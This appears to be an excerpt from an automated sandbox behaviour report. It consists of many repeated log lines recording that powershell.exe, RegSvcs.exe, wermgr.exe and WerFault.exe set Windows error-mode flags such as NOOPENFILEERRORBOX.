            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
